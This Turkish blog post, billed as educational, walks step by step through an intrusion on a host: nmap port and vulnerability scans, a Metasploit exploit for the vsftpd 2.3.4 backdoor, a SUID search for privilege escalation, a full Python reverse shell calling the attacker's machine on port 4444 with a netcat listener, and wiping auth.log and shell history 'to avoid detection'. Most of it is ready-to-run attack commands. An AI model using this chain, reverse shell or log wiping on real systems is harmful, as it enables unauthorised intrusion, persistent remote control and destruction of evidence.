Penetrasyon Testi için Adımlar (Eğitim Amaçlı)

📌 1. Bilgi Toplama (Reconnaissance)

Bu aşamada hedef hakkında bilgi toplanır. Örneğin, Nmap kullanarak bir sistemin açık portlarını tarayalım.

🔹 Nmap ile Açık Port Tarama (Aktif Bilgi Toplama)

bashKopyalaDüzenlenmap -sS -Pn -T4 -p- 192.168.1.1

Bu komut:
SYN taraması yapar
Tüm portları tarar
Açık portları ve servisleri listeler


📌 2. Zafiyet Analizi

Açık portlardan birinde çalışan servislerde zafiyet olup olmadığını kontrol edelim.

🔹 Nmap ile Servis Tespiti ve Zafiyet Tarama

bashKopyalaDüzenlenmap -sV --script=vuln 192.168.1.1

Bu komut, hedef sistemde çalışan servisleri tespit eder ve varsa CVE açıklarını listeler.


📌 3. Exploitation (İstismar)

Hedefte bulunan bir FTP servisini (vsftpd 2.3.4) exploit etmek için Metasploit Framework kullanabiliriz.

🔹 Metasploit ile Exploit Çalıştırma

bashKopyalaDüzenlemsfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
exploit

Bu komut ile arka kapı (backdoor) açılır ve sisteme uzaktan bağlanma imkanı elde edilir.


📌 4. Yetki Yükseltme (Privilege Escalation)

Sisteme bağlandıktan sonra yetki yükseltme işlemi yapabiliriz.

🔹 Linux’ta SUID Biten Dosyaları Bulma (Yetki Yükseltme Öncesi)

bashKopyalaDüzenlefind / -perm -4000 2>/dev/null

Bu komut, SUID biti aktif olan dosyaları listeler. Örneğin, /bin/bash dosyası varsa, root yetkisine sahip olabiliriz.


📌 5. Kalıcı Erişim Sağlama

Yetki yükselttikten sonra kalıcı erişim sağlamak için bir reverse shell açabiliriz.

🔹 Python ile Reverse Shell Bağlantısı

Hedef sisteme şu komutu çalıştırarak saldırganın sistemine bağlantı açabiliriz:

bashKopyalaDüzenlepython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bunun için saldırgan tarafında nc dinleyici açmalıyız:

bashKopyalaDüzenlenc -lvp 4444

Bağlantı sağlandığında hacker, hedef makinede shell elde eder.


📌 6. Logları Silme ve Raporlama

Tespit edilmemek için sistem loglarını temizleme işlemi yapılabilir.

🔹 Linux Log Temizleme

bashKopyalaDüzenleecho "" > /var/log/auth.log
history -c

Bu komut, yetkisiz erişim izlerini kaldırır.


📌 Akış Diyagramı

Pentest sürecinin temel akışını aşağıdaki gibi görselleştirebiliriz:

plaintextKopyalaDüzenle        Başlangıç
            |
            ▼
   📡 Bilgi Toplama
   (Nmap, Recon-ng)
            |
            ▼
 🔍 Zafiyet Tespiti
   (Exploit-DB, CVE)
            |
            ▼
 💣 Exploitation
   (Metasploit, RCE)
            |
            ▼
 🚀 Yetki Yükseltme
   (Privilege Escalation)
            |
            ▼
 🔒 Kalıcı Erişim
   (Reverse Shell)
            |
            ▼
 📊 Raporlama ve Log Temizleme
            |
            ▼
        Bitiş ✅
  • Gönderiler/Makaleler/Tezler

    Temel İstihbarat ve Uluslararası İlişkilerSiber Çağda Bilgi ve Güvenlik (KİTABI)

    ISP Log Management and Deletion Methods from Servers: Technical Guide and Application Handbook

    By SELÇUK DİKİCİ “ISP Log Management and Server Deletion Methods: Technical Guide and Application Booklet” offers an in-depth look at log management and data persistence, topics of critical importance in the…

    Bir yanıt yazın

    E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

    Neler Kaçırdın?

    Temel İstihbarat ve Uluslararası İlişkilerSiber Çağda Bilgi ve Güvenlik (KİTABI)

    • By admin
    • Temmuz 18, 2025
    • 54 views
    Temel İstihbarat ve Uluslararası İlişkilerSiber Çağda Bilgi ve Güvenlik (KİTABI)

    ISP Log Management and Deletion Methods from Servers: Technical Guide and Application Handbook

    • By admin
    • Temmuz 12, 2025
    • 36 views
    ISP Log Management and Deletion Methods from Servers: Technical Guide and Application Handbook

    ISP Log Yönetimi ve Sunuculardan Silinme Yöntemleri: Teknik Kılavuz ve Uygulama Kitapçığı

    • By admin
    • Temmuz 12, 2025
    • 39 views
    ISP Log Yönetimi ve Sunuculardan Silinme Yöntemleri: Teknik Kılavuz ve Uygulama Kitapçığı

    21. Yüzyılda Dijitalleşme ile Kesişen Disiplinler

    • By admin
    • Temmuz 11, 2025
    • 43 views
    21. Yüzyılda Dijitalleşme ile Kesişen Disiplinler

    ANTİK ÇAĞLARDAN GÜNÜMÜZE ENDÜSTRİYEL TASARIMIN TARİHİ GELİŞİMİ

    • By admin
    • Temmuz 9, 2025
    • 44 views
    ANTİK ÇAĞLARDAN GÜNÜMÜZE ENDÜSTRİYEL TASARIMIN TARİHİ GELİŞİMİ

    DARK WEB TARAMASI VE TAKTİKSEL SİBER İSTİHBARAT: MODERN YAKLAŞIMLAR VE TEKNİK ARAÇLAR

    • By admin
    • Mayıs 5, 2025
    • 174 views
    DARK WEB TARAMASI VE TAKTİKSEL SİBER İSTİHBARAT: MODERN YAKLAŞIMLAR VE TEKNİK ARAÇLAR